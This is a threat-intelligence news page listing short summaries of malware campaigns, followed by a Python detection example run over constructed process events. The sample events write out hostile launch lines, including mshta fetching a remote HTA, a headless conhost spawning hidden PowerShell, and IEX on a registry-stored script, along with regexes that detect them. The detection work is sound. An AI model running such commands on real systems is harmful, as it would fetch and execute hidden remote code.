News
GammaSteel Uses Registry-Stored PowerShell and Tebi
1+ day, 1+ hour ago (751+ words) SOC Prime Bias: Critical GammaSteel: Inside Gamaredon's Unfolding Malware Chain The report describes GammaSteel, a new Gamaredon (UAC-0010) intrusion chain built around a fileless PowerShell stealer. The malware stores 71 encrypted functions in the HKCU\Printers…
Fake Defender DLP MSI Delivers Havoc Stager
5+ day, 5+ hour ago (352+ words) SOC Prime Bias: Medium The Demon Arrives Later: A Havoc Stager Hides Behind Microsoft Defender DLP Threat actors in Brazil are distributing spoofed electronic invoice (NF-e) ZIP attachments that deliver a malicious MSI installer. The MSI drops a…
Donut Loader Delivers Remcos RAT via colorcpl.exe
1+ week, 1+ hour ago (401+ words) SOC Prime Bias: Medium Donut Loader Reloaded in a Modern Remcos RAT Campaign G DATA has identified a fresh Remcos RAT campaign that begins with a malicious batch file and moves through several scripting layers, including PowerShell,…
SideCopy Deploys XenoRAT Against Afghanistan's MoF
1+ week, 1+ hour ago (388+ words) SOC Prime Bias: Critical Operation XENOFISCAL: SideCopy Deploys Persistent XenoRAT Against Afghanistan's Ministry of Finance The report outlines a spear-phishing operation in which a malicious LNK file triggers mshta.exe to download and execute a remote…
Operation Dragon Weave Uses Azure C2 Against Czech and Taiwan
1+ week, 1+ hour ago (748+ words) SOC Prime Bias: Critical Operation Dragon Weave Uses Azure Cloud C2 to Target Czech Republic and Taiwan A targeted espionage operation tracked as Operation Dragon Weave uses malicious LNK shortcut files together with a Rust-based executable to launch a…
UNG0002 Targets Chinese Universities with Cobalt Strike
2+ week, 4+ day ago (346+ words) SOC Prime Bias: Critical UNG0002 Targets Chinese Academia with Weaponized Institutional Lures A threat actor tracked as UNG0002 launched a spear-phishing campaign against Chinese universities using a malicious ZIP archive disguised as an official fitness testing notice. Inside the archive…
SHub Reaper Targets macOS with Fake Brand Installers
2+ week, 5+ day ago (317+ words) SOC Prime Bias: Medium SHub Reaper | macOS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain The report analyzes a new macOS infostealer variant called SHub Reaper, which uses fake WeChat and Miro…
PureLogs Delivered via Paws Runner Steganography
3+ week, 1+ day ago (400+ words) SOC Prime Bias: Medium PureLogs Delivered Through Paws Runner Steganography The campaign relies on a phishing email carrying a TXZ archive that delivers a JavaScript loader, which sets environment variables and launches conhost.exe in headless…
Iranian-Nexus Campaign Hits Omani Government Ministries
1+ mon, 2+ day ago (293+ words) SOC Prime Bias: Critical Iranian-Nexus Attack Exposes 26,000 Citizen Records in Oman A state-aligned Iranian threat actor compromised multiple government ministries in Oman by using webshells, ProxyShell exploits, and a custom command-and-control environment hosted on a UAE-based VPS.
SHADOW-EARTH-053 Targets Exchange Servers in Asia
1+ mon, 4+ day ago (460+ words) SOC Prime Bias: Critical Inside Shadow-Earth-053: A China-Aligned Cyberespionage Campaign Against Government and Defense Sectors in Asia A China-aligned threat cluster tracked as SHADOW-EARTH-053 has been exploiting unpatched Microsoft Exchange and IIS servers…
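Three of the chains listed above share launch patterns that show up in plain process-creation telemetry: mshta.exe handed a remote URL (the XENOFISCAL LNK chain), conhost.exe started in headless mode as a proxy launcher (the PureLogs JavaScript loader), and PowerShell pulling script content out of the registry and evaluating it (the fileless GammaSteel stealer). The following is an added example, not code from SOC Prime or from any of the reports summarized here: Python detection logic run over constructed, Sysmon-style process events. The event fields, the registry key, the IP address and the file paths in the sample events are all invented for the example and carry no indicator value.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Simplified process-creation event (the fields Sysmon Event ID 1 carries)."""
    image: str
    parent_image: str
    command_line: str


# Constructed sample telemetry: three malicious launches modelled on the news items
# above plus two benign look-alikes. Hosts, paths and registry keys are invented.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta.exe http://198.51.100.7/notice.hta"),
    ProcEvent(r"C:\Windows\System32\conhost.exe", r"C:\Windows\System32\wscript.exe",
              r'conhost.exe --headless powershell.exe -w hidden -nop -c "Start-Process C:\Users\Public\run.bat"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\wscript.exe",
              r'powershell.exe -nop -w hidden -c "IEX (Get-ItemProperty -Path HKCU:\Software\Example).Stage"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              "powershell.exe -NoProfile -Command Get-Process"),
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
REG_HIVE_RE = re.compile(r"\bHK(?:CU|LM|EY_CURRENT_USER|EY_LOCAL_MACHINE)\b", re.IGNORECASE)
REG_READ_RE = re.compile(r"Get-ItemProperty|GetValue\(|\[Microsoft\.Win32\.Registry\]", re.IGNORECASE)
EVAL_RE = re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so image comparisons ignore directory and case."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of the rules that fire on one event (empty list if none)."""
    hits = []
    image = basename(ev.image)
    cmd = ev.command_line
    # Rule 1: mshta.exe fetching a remote HTA rather than opening a local file.
    if image == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")
    # Rule 2: conhost.exe used with --headless to spawn a hidden child process.
    if image == "conhost.exe" and "--headless" in cmd.lower():
        hits.append("conhost_headless_launcher")
    # Rule 3: PowerShell reading a registry value and evaluating it as code.
    if (image in ("powershell.exe", "pwsh.exe") and REG_HIVE_RE.search(cmd)
            and REG_READ_RE.search(cmd) and EVAL_RE.search(cmd)):
        hits.append("powershell_registry_stored_script")
    return hits


def detect(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index to the rules it triggered, keeping only events with at least one hit."""
    results = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, rules in detect(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {basename(ev.parent_image)} -> {basename(ev.image)}: {', '.join(rules)}")
```

Rule 3 deliberately requires all three signals (a hive name, a registry read call, and an evaluation primitive) on the same command line; a rule keyed on any one of them would fire on ordinary administrative scripts. Real deployments would also need to cover encoded command lines, which none of these regexes see through.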